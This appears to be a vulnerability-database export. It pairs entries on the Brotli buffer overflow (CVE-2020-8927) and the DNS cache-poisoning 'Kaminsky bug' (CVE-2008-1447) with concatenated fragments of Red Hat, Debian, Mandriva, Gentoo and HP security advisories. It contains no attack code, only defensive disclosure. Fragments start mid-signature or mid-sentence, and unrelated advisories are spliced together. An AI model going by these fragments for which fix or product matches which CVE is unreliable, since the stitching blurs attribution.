xGqDhJJbYby4Uhqe0eNPG5P01UW+8aWyXIxtpuG/uCJ0oC65j4yXpG136fuztx1a
R+7c2xYeuZ1qrNvYsJDecYtgDwlSuhWJ/S+snlYAgB4HJ6ouHPx2Y0SYu2Xznm/2
fNj5oV13UioCVvTptBU6dI6ByX8qalq0fIbt+lb5M23vu+zlpMs6b80u3pekC7uR
3PM9Udb59P9wIcwDlS1v9jSyO/4B3maCh6vtjpdGDBUIbbOSE5E9S7zTR4vHFzhI
ji5EcEHGpBz615xVGi/fSzudyR/2yjzqjazhkX5dYEZ5kOBtOOeAxTIgAQ3yhjt2
+ZFPoA9cSGTxR3AhZU+lnggpod97b8rD3IqCuz2PetsRoikUTQSIRiKBlp058FAt
/NJdeWcHmjI=t/FA
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. (CVE-2021-0145)
Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel
processors did not prevent test and debug logic from being activated at
runtime. (CVE-2022-21125)
Alysa Milburn, Jason Brandt, Avishai Redelman and Nir Lavi discovered that
some Intel processors improperly optimised security-critical code |
|
var-202009-1442
|
A buffer overflow exists in the Brotli library versions prior to 1.0.8 where an attacker controlling the input length of a "one-shot" decompression request to a script can trigger a crash, which happens when copying over chunks of data larger than 2 GiB. It is recommended to update your Brotli library to 1.0.8 or later. If one cannot update, we recommend to use the "streaming" API as opposed to the "one-shot" API, and impose chunk size limits. Brotli A classic buffer overflow vulnerability exists in the library.Information is tampered with and denial of service (DoS) It may be put into a state.
For the stable distribution (buster), this problem has been fixed in
version 1.0.7-2+deb10u1.
We recommend that you upgrade your brotli packages.
For the detailed security status of brotli please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/brotli
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl/GuhkACgkQEMKTtsN8
TjZ68A/9ED9ToGA8pwsL99uHc4FA6EBIKzPDIz4I649PTvrKi8wpfa6RqrcfhcCE
xfOx4+PiYaUqOnAy02O0cbkvzQvcGIVlrIxJ0v4/QFAbiuX5Gy/q9b3ZkHsIRybK
+PywHjHEKBqwR9vetV1xYM8s4Smh6iwH+UjHxt9E0/KEHWQF17N094yubtrIJrDf
irZDMFnXYCeWRrAZH5rwB6Be6X0nQri3WF9vcdBK61vktSv+iTVklCNbIKrQr1p8
SHPIlUBIp/LjeHaSq+ZNYzSwg1LVtGKqwlvWaRbiBY3Uf5VYyXVKRL7m8WDR7ozu
GnfIpBnfttx2sptBAAq8OFx9hmzFEGVSfNy5sXbhb9HoUjX2URUUzN+1z71Da6Tz
XrMgJlJ9YQrDAV0dpakztVdSbWV9Ub3bS3Jth3L42dsJGA7qyfs3KmsnkNJj5x3L
dHQl6VZRxvUpsHE9zyKAN/rnPyvcrloZ04qxWtJKcvR113mFTlehKDTNjWzCnSic
Knzzl/ArWjyNFQ+1kNwXbMSSIOvgBHYSwQI8rqjvaR33jk+P1Mt41VRzdwmT6t5c
4c85j18OrBdAfu1E7Fqy3MAeZq7dRR0prQzVAvxzUXgu/4G8nCvRbW6MDt2scnR0
BYT1fKy//PWHKdNzOMdjbE6Ab6rX0DbaNfHgpjsD2r0VYSv7W/E=
=mzSF
-----END PGP SIGNATURE-----
. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
Brotli is a generic-purpose lossless compression algorithm that compresses
data using a combination of a modern variant of the LZ77 algorithm, Huffman
coding and 2nd order context modeling, with a compression ratio comparable
to the best currently available general-purpose compression methods. It is
similar in speed with deflate but offers more dense compression. Summary:
Red Hat Advanced Cluster Management for Kubernetes 2.2.4 General
Availability
release images, which fix several bugs and security issues. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images
Red Hat Advanced Cluster Management for Kubernetes provides the
capabilities to address common challenges that administrators and site
reliability
engineers face as they work across a range of public and private cloud
environments.
Clusters and applications are all visible and managed from a single
console—with security policy built in. See
the following Release Notes documentation, which will be updated shortly
for
this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana
gement_for_kubernetes/2.2/html/release_notes/
Security fixes:
* redisgraph-tls: redis: integer overflow when configurable limit for
maximum supported bulk input size is too big on 32-bit platforms
(CVE-2021-21309)
* console-header-container: nodejs-netmask: improper input validation of
octal input data (CVE-2021-28092)
* console-container: nodejs-is-svg: ReDoS via malicious string
(CVE-2021-28918)
Bug fixes:
* RHACM 2.2.4 images (BZ# 1957254)
* Enabling observability for OpenShift Container Storage with RHACM 2.2 on
OCP 4.7 (BZ#1950832)
* ACM Operator should support using the default route TLS (BZ# 1955270)
* The scrolling bar for search filter does not work properly (BZ# 1956852)
* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)
* The proxy setup in install-config.yaml is not worked when IPI installing
with RHACM (BZ# 1960181)
* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)
* Observability Thanos store shard crashing - cannot unmarshall DNS message
(BZ# 1967890)
3. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms
1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string
1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data
1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7
1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory
1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters
1954535 - Reinstall Submariner - No endpoints found on one cluster
1955270 - ACM Operator should support using the default route TLS
1956852 - The scrolling bar for search filter does not work properly
1957254 - RHACM 2.2.4 images
1959426 - Limits on Length of MultiClusterObservability Resource Name
1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM.
1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service"
1966513 - Unable to make SSH connection to a Bitbucket server
1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error.
1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message
5. Description:
Windows Container Support for Red Hat OpenShift allows you to deploy
Windows container workloads running on Windows Server containers.
Bug Fix(es):
* WMCO patch pub-key-hash annotation to Linux node (BZ#1945248)
* LoadBalancer Service type with invalid external loadbalancer IP breaks
the datapath (BZ#1952917)
* Telemetry info not completely available to identify windows nodes
(BZ#1955319)
* WMCO incorrectly shows node as ready after a failed configuration
(BZ#1956412)
* kube-proxy service terminated unexpectedly after recreated LB service
(BZ#1963263)
3. Solution:
For Windows Machine Config Operator upgrades, see the following
documentation:
https://docs.openshift.com/container-platform/4.7/windows_containers/window
s-node-upgrades.html
4. Bugs fixed (https://bugzilla.redhat.com/):
1945248 - WMCO patch pub-key-hash annotation to Linux node
1946538 - CVE-2021-25736 kubernetes: LoadBalancer Service type don't create a HNS policy for empty or invalid external loadbalancer IP, what could lead to MITM
1952917 - LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath
1955319 - Telemetry info not completely available to identify windows nodes
1956412 - WMCO incorrectly shows node as ready after a failed configuration
1963263 - kube-proxy service terminated unexpectedly after recreated LB service
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: .NET Core 3.1 on RHEL 7 security and bugfix update
Advisory ID: RHSA-2022:0829-01
Product: .NET Core on Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2022:0829
Issue date: 2022-03-10
CVE Names: CVE-2020-8927 CVE-2022-24464 CVE-2022-24512
=====================================================================
1. Summary:
An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux
7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64
.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64
3. Description:
.NET is a managed-software framework. It implements a subset of the .NET
framework APIs and several new APIs, and it includes a CLR implementation.
New versions of .NET that address security vulnerabilities are now
available. The updated versions are .NET SDK 3.1.417 and .NET Runtime
3.1.23.
Security Fix(es):
* dotnet: ASP.NET Denial of Service via FormPipeReader (CVE-2022-24464)
* dotnet: double parser stack buffer overrun (CVE-2022-24512)
* brotli: buffer overflow when input chunk is larger than 2GiB
(CVE-2020-8927)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1879225 - CVE-2020-8927 brotli: buffer overflow when input chunk is larger than 2GiB
2061847 - CVE-2022-24464 dotnet: ASP.NET Denial of Service via FormPipeReader
2061854 - CVE-2022-24512 dotnet: double parser stack buffer overrun
6. Package List:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
rh-dotnet31-dotnet-3.1.417-1.el7_9.src.rpm
x86_64:
rh-dotnet31-aspnetcore-runtime-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-debuginfo-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-host-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-hostfxr-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-runtime-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-sdk-3.1-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-templates-3.1-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.417-1.el7_9.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Server (v. 7):
Source:
rh-dotnet31-dotnet-3.1.417-1.el7_9.src.rpm
x86_64:
rh-dotnet31-aspnetcore-runtime-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-debuginfo-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-host-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-hostfxr-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-runtime-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-sdk-3.1-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-templates-3.1-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.417-1.el7_9.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-dotnet31-dotnet-3.1.417-1.el7_9.src.rpm
x86_64:
rh-dotnet31-aspnetcore-runtime-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-debuginfo-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-host-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-hostfxr-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-runtime-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-sdk-3.1-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.23-1.el7_9.x86_64.rpm
rh-dotnet31-dotnet-templates-3.1-3.1.417-1.el7_9.x86_64.rpm
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.417-1.el7_9.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2020-8927
https://access.redhat.com/security/cve/CVE-2022-24464
https://access.redhat.com/security/cve/CVE-2022-24512
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYippStzjgjWX9erEAQhIVQ/+KaWuTu5qx9aBrzo+gGMJbE0ldm+qAon9
x641a4Usu0ZC3y+DWhRCkM2hCHbxKIXg8WhLJ/GN2/VfAQwVRIt/YwOVarRkGuFF
xb3YQ5LpA2iQcZ/QcwSobe3MeoJrTiXhq1hENEnkspELV08/q5EOKrvnvKVM7t96
pwK88Ry7lq5iYF9y0tHd38IunXAGVUQaNq2GJ54xFhvVmaNNDa4R8wvRJ0e/IhS0
VyIrtjktZCYyAKPmf/OqcPsVI6WueYSPU/W9jRU7z69JOBvqN1i1ZUnfIgaMPMVg
VliTB5Z4fFJ1t1DTCH98iPHgUdxy5FBrbIEx0EIZSVDHs/WO3PXmI+x9H1kihSTV
9hmSZ5aX2bngR9oGqMemsFoa0kZGiGzHNJ+WRP6CPK1lJA+cSMnwTv0LBLrElAS0
m+OhpVoXOl1pS8yB9MdJpjNuv+hkIxiwdR056glF2/CdJUimDsIV+R5349/j51u1
iqPu7hsaoOGOl8U1qIfINtw9GNnImDw6EGpyxIdn8I4C3Z66TYYkfL0VKSODUxfm
r/Ngyhhgud6Q5cyps4KH/TzKPwTEOyzpx4a8ehVbvRtN8HkdevZlDoFNBCT41uKJ
Lpk32YK2TBvsNYYMvxoTYAVXW95jPFcexVT1ElYfnKbXmiMYMXhFKavpq5NaUOrD
vbL/opMlrgQ=
=vceG
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
.
Security Fix(es):
* golang: crypto/tls: certificate of wrong type is causing TLS client to
panic
(CVE-2021-34558)
* golang: net: lookup functions may return invalid host names
(CVE-2021-33195)
* golang: net/http/httputil: ReverseProxy forwards connection headers if
first one is empty (CVE-2021-33197)
* golang: match/big.Rat: may cause a panic or an unrecoverable fatal error
if passed inputs with very large exponents (CVE-2021-33198)
* golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a
custom TokenReader (CVE-2021-27918)
* golang: net/http: panic in ReadRequest and ReadResponse when reading a
very large header (CVE-2021-31525)
* golang: archive/zip: malformed archive may cause panic or memory
exhaustion (CVE-2021-33196)
It was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196
have been incorrectly mentioned as fixed in RHSA for Serverless client kn
1.16.0. This has been fixed (CVE-2021-3703). Solution:
See the Red Hat OpenShift Container Platform 4.6 documentation at:
https://access.redhat.com/documentation/en-us/openshift_container_platform/
4.6/html/serverless/index
See the Red Hat OpenShift Container Platform 4.7 documentation at:
https://access.redhat.com/documentation/en-us/openshift_container_platform/
4.7/html/serverless/index
See the Red Hat OpenShift Container Platform 4.8 documentation at:
https://access.redhat.com/documentation/en-us/openshift_container_platform/
4.8/html/serverless/index
4. Bugs fixed (https://bugzilla.redhat.com/):
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic
1983651 - Release of OpenShift Serverless Serving 1.17.0
1983654 - Release of OpenShift Serverless Eventing 1.17.0
1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names
1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty
1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents
1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196
5 |
|
var-200707-0675
|
The DNS protocol, as implemented in (1) BIND 8 and 9 before 9.5.0-P1, 9.4.2-P1, and 9.3.5-P1; (2) Microsoft DNS in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2; and other implementations allow remote attackers to spoof DNS traffic via a birthday attack that uses in-bailiwick referrals to conduct cache poisoning against recursive resolvers, related to insufficient randomness of DNS transaction IDs and source ports, aka "DNS Insufficient Socket Entropy Vulnerability" or "the Kaminsky bug.". Deficiencies in the DNS protocol and common DNS implementations facilitate DNS cache poisoning attacks. Various implementations of DNS services may allow multiple simultaneous queries for the same resource record, allowing an attacker to apply probabilistic techniques to improve their odds of successful DNS spoofing. In IP NAT filtering in Sun Solaris 10 and OpenSolaris series products, when a DNS server runs NAT, it incorrectly changes the original address of the data packet. And spoof the address returned by the DNS response. This could be used to misdirect users and services;
i.e.
This update provides the latest stable BIND releases for all platforms
except Corporate Server/Desktop 3.0 and MNF2, which have been patched
to correct the issue.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2007.1:
73cc24fc9586b7ab290d755012c16a79 2007.1/i586/bind-9.4.2-0.1mdv2007.1.i586.rpm
70867c50cfd64b4406aa002d627d740b 2007.1/i586/bind-devel-9.4.2-0.1mdv2007.1.i586.rpm
3603e9d9115466753397a1f472011703 2007.1/i586/bind-utils-9.4.2-0.1mdv2007.1.i586.rpm
cf5e4100ecb21a4eb603831e5a6ec23d 2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
4eb7ce0984d3ce3befff667392e3bf3e 2007.1/x86_64/bind-9.4.2-0.1mdv2007.1.x86_64.rpm
d7b9a9e7d4c52a5b0c54f59ca20bf2d5 2007.1/x86_64/bind-devel-9.4.2-0.1mdv2007.1.x86_64.rpm
c5c66c9609615029d2f07f7b09a63118 2007.1/x86_64/bind-utils-9.4.2-0.1mdv2007.1.x86_64.rpm
cf5e4100ecb21a4eb603831e5a6ec23d 2007.1/SRPMS/bind-9.4.2-0.1mdv2007.1.src.rpm
Mandriva Linux 2008.0:
52dfe3970fcd9495b2bb9379a9312b25 2008.0/i586/bind-9.4.2-1mdv2008.0.i586.rpm
97d20d35b6814aa2f9fab549ca6237c0 2008.0/i586/bind-devel-9.4.2-1mdv2008.0.i586.rpm
87a7bb3dd25abd8cd882a8f2fdc2398e 2008.0/i586/bind-utils-9.4.2-1mdv2008.0.i586.rpm
da4444a8074e6ede39dfa557fb258db7 2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
b9d0337363bc1e2b14505f25d4ee5f99 2008.0/x86_64/bind-9.4.2-1mdv2008.0.x86_64.rpm
9b75e2a96784c00c2912bc3bf333d089 2008.0/x86_64/bind-devel-9.4.2-1mdv2008.0.x86_64.rpm
0a593b090d9e6bda3666e234056e19ba 2008.0/x86_64/bind-utils-9.4.2-1mdv2008.0.x86_64.rpm
da4444a8074e6ede39dfa557fb258db7 2008.0/SRPMS/bind-9.4.2-1mdv2008.0.src.rpm
Mandriva Linux 2008.1:
2534ef007262d4ea2d219bab0190466c 2008.1/i586/bind-9.5.0-3mdv2008.1.i586.rpm
c3feee5d05aa3aee14cd70a2d295d0b1 2008.1/i586/bind-devel-9.5.0-3mdv2008.1.i586.rpm
f306c06665b723a2530258e6d1dbdae2 2008.1/i586/bind-doc-9.5.0-3mdv2008.1.i586.rpm
967ef80628f92160930bc3a3827a216e 2008.1/i586/bind-utils-9.5.0-3mdv2008.1.i586.rpm
70fc7a7964944a2926979710c5148ed1 2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
3f4d96d7a7f913c141e1f63cdc7e7336 2008.1/x86_64/bind-9.5.0-3mdv2008.1.x86_64.rpm
420db658366763686198f41394aa72b3 2008.1/x86_64/bind-devel-9.5.0-3mdv2008.1.x86_64.rpm
6f3674f68311494c5a9ff0dbce831e82 2008.1/x86_64/bind-doc-9.5.0-3mdv2008.1.x86_64.rpm
4294b3a086b89bf53c5c967c17962447 2008.1/x86_64/bind-utils-9.5.0-3mdv2008.1.x86_64.rpm
70fc7a7964944a2926979710c5148ed1 2008.1/SRPMS/bind-9.5.0-3mdv2008.1.src.rpm
Corporate 3.0:
de2a4372d1c25d73f343c9fcb044c9dd corporate/3.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm
1f24f6dbdb6c02e21cbbef99555049cb corporate/3.0/i586/bind-devel-9.2.3-6.5.C30mdk.i586.rpm
00405b98290d5a41f226081baa57e18d corporate/3.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm
6a237dc290f4f7c463b1996e6a4a4515 corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm
Corporate 3.0/X86_64:
628162f3d6a414828d2231fefc46842b corporate/3.0/x86_64/bind-9.2.3-6.5.C30mdk.x86_64.rpm
dd29ff31a9cffcc1b20fd045869d7013 corporate/3.0/x86_64/bind-devel-9.2.3-6.5.C30mdk.x86_64.rpm
c475c1a4d048e04da1fc27dcbb17c3f3 corporate/3.0/x86_64/bind-utils-9.2.3-6.5.C30mdk.x86_64.rpm
6a237dc290f4f7c463b1996e6a4a4515 corporate/3.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm
Corporate 4.0:
271ead204904be302d197cd542f5ae23 corporate/4.0/i586/bind-9.3.5-0.4.20060mlcs4.i586.rpm
42413dcc1cf053e735216f767eff4e5d corporate/4.0/i586/bind-devel-9.3.5-0.4.20060mlcs4.i586.rpm
0201afe493a41e1deedc9bf7e9725f4a corporate/4.0/i586/bind-utils-9.3.5-0.4.20060mlcs4.i586.rpm
86bc0cdc9ed1b959b6f56e0660268f2e corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
b1a18a7d0578dab7bd825eda6c682b3d corporate/4.0/x86_64/bind-9.3.5-0.4.20060mlcs4.x86_64.rpm
6a2ebd550feb9147058de05b1a1ef04d corporate/4.0/x86_64/bind-devel-9.3.5-0.4.20060mlcs4.x86_64.rpm
670a1b934ce4974b8505018ab69ade0b corporate/4.0/x86_64/bind-utils-9.3.5-0.4.20060mlcs4.x86_64.rpm
86bc0cdc9ed1b959b6f56e0660268f2e corporate/4.0/SRPMS/bind-9.3.5-0.4.20060mlcs4.src.rpm
Multi Network Firewall 2.0:
5b694c24cc2092e38f531dbfdd5c9d41 mnf/2.0/i586/bind-9.2.3-6.5.C30mdk.i586.rpm
c08bc805027059c47bed32215f17eacb mnf/2.0/i586/bind-utils-9.2.3-6.5.C30mdk.i586.rpm
39225289516498e1b071c5059306f2b9 mnf/2.0/SRPMS/bind-9.2.3-6.5.C30mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIdPwTmqjQ0CJFipgRAm9AAJ9/UOAuOWDL1KgnMNGM/224QGUNQgCfW+G9
J7qxrU208lhOcIjhtq8FWX8=
=91dV
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200812-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Ruby: Multiple vulnerabilities
Date: December 16, 2008
Bugs: #225465, #236060
ID: 200812-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been discovered in Ruby that allow for
attacks including arbitrary code execution and Denial of Service.
Background
==========
Ruby is an interpreted object-oriented programming language. The
elaborate standard library includes an HTTP server ("WEBRick") and a
class for XML parsing ("REXML").
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-lang/ruby < 1.8.6_p287-r1 >= 1.8.6_p287-r1
Description
===========
Multiple vulnerabilities have been discovered in the Ruby interpreter
and its standard libraries. Drew Yao of Apple Product Security
discovered the following flaws:
* Arbitrary code execution or Denial of Service (memory corruption)
in the rb_str_buf_append() function (CVE-2008-2662).
* Arbitrary code execution or Denial of Service (memory corruption)
in the rb_ary_stor() function (CVE-2008-2663).
* Memory corruption via alloca in the rb_str_format() function
(CVE-2008-2664).
* Memory corruption ("REALLOC_N") in the rb_ary_splice() and
rb_ary_replace() functions (CVE-2008-2725).
* Memory corruption ("beg + rlen") in the rb_ary_splice() and
rb_ary_replace() functions (CVE-2008-2726).
Furthermore, several other vulnerabilities have been reported:
* Tanaka Akira reported an issue with resolv.rb that enables
attackers to spoof DNS responses (CVE-2008-1447).
* Akira Tagoh of RedHat discovered a Denial of Service (crash) issue
in the rb_ary_fill() function in array.c (CVE-2008-2376).
* Several safe level bypass vulnerabilities were discovered and
reported by Keita Yamaguchi (CVE-2008-3655).
* Christian Neukirchen is credited for discovering a Denial of
Service (CPU consumption) attack in the WEBRick HTTP server
(CVE-2008-3656).
* A fault in the dl module allowed the circumvention of taintness
checks which could possibly lead to insecure code execution was
reported by "sheepman" (CVE-2008-3657).
* Tanaka Akira again found a DNS spoofing vulnerability caused by the
resolv.rb implementation using poor randomness (CVE-2008-3905).
* Luka Treiber and Mitja Kolsek (ACROS Security) disclosed a Denial
of Service (CPU consumption) vulnerability in the REXML module when
dealing with recursive entity expansion (CVE-2008-3790).
Impact
======
These vulnerabilities allow remote attackers to execute arbitrary code,
spoof DNS responses, bypass Ruby's built-in security and taintness
checks, and cause a Denial of Service via crash or CPU exhaustion.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Ruby users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/ruby-1.8.6_p287-r1"
References
==========
[ 1 ] CVE-2008-1447
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
[ 2 ] CVE-2008-2376
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376
[ 3 ] CVE-2008-2662
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662
[ 4 ] CVE-2008-2663
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663
[ 5 ] CVE-2008-2664
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664
[ 6 ] CVE-2008-2725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725
[ 7 ] CVE-2008-2726
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726
[ 8 ] CVE-2008-3655
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3655
[ 9 ] CVE-2008-3656
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
[ 10 ] CVE-2008-3657
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3657
[ 11 ] CVE-2008-3790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3790
[ 12 ] CVE-2008-3905
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3905
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200812-17.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. The vulnerability could be exploited to
poison the DNS cache leading to remote unauthorized access or Denial of Service
(DoS).
HP-UX B.11.00.
BACKGROUND
For a PGP signed version of this security bulletin please write to: security-alert@hp.com
